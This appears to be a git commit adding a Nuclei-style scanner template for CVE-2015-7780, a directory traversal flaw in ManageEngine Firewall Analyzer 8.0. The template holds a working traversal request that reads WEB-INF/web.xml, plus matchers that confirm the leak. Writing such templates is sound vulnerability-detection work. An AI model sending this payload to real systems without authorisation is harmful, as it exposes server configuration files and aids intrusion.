Create CVE-2015-7780.yaml
parent
6564d0fca4
commit
20c0e48117
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2015-7780
|
||||
|
||||
info:
|
||||
name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35933
|
||||
- https://www.cvedetails.com/cve/CVE-2015-7780/
|
||||
tags: cve,cve2015,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "</web-app>"
|
||||
- "java.sun.com"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/xml"
|
Loading…
Reference in New Issue